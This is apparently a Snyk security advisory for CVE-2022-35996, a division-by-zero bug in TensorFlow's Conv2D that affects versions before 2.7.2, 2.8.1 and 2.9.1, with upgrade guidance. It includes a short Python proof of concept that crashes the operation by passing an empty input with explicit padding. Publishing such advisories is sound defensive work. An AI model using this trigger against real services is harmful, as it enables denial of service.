Division by zero Affecting tensorflow package, versions [,2.7.2)[2.8.0,2.8.1)[2.9.0,2.9.1)


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

EPSS
0.08% (37th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-TENSORFLOW-3026788
  • published18 Sept 2022
  • disclosed18 Sept 2022
  • creditUnknown

Introduced: 18 Sep 2022

CVE-2022-35996  (opens in a new tab)
CWE-369  (opens in a new tab)

How to fix?

Upgrade tensorflow to version 2.7.2, 2.8.1, 2.9.1 or higher.

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Division by zero when Conv2D is given empty input and the filter and padding sizes are valid, the output is all-zeros.

PoC:

import tensorflow as tf
import numpy as np
with tf.device("CPU"): # also can be triggerred on GPU
   input = np.ones([1, 0, 2, 1])
   filter = np.ones([1, 1, 1, 1])
   strides = ([1, 1, 1, 1])
   padding = "EXPLICIT"
   explicit_paddings = [0 , 0, 1, 1, 1, 1, 0, 0]
   data_format = "NHWC"
   res = tf.raw_ops.Conv2D(
       input=input,
       filter=filter,
       strides=strides,
       padding=padding,
        explicit_paddings=explicit_paddings,
       data_format=data_format,
  )

References

CVSS Scores

version 3.1